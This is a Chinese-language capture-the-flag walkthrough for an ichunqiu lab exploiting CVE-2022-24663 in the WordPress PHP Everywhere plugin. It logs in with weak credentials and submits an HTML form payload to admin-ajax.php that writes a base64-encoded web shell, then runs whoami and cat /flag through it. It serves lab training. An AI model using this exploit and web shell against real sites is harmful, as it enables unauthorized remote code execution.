春秋云镜 CVE-2022-24663 wordpress插件PHP Everywhere RCE
靶标介绍
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令。
启动场景
漏洞利用
经典wordpress页面,默认后台/wp-admin,提示弱口令test/test,登录成功。
利用过程为html插入form表单,然后提交。
<form action="http://eci-2ze7m6n7o8t9qjwawqbs.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php" method="post">
<input name="action" value="parse-media-shortcode" />
<textarea name="shortcode">[php_everywhere] <?php file_put_contents("/var/www/html/shell.php",base64_decode("PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pg==")); ?>[/php_everywhere]</textarea>
<input type="submit" value="Execute" />
</form>
右键检查,右键点击更改HTML表单
“success” 上传成功
执行命令获取flag。
http://eci-2ze7m6n7o8t9qjwawqbs.cloudeci1.ichunqiu.com/shell.php?cmd=whoami
http://eci-2ze7m6n7o8t9qjwawqbs.cloudeci1.ichunqiu.com/shell.php?cmd=cat%20/flag
得到flag
flag{b61505b8-77df-4647-8676-0b17fb2327cd}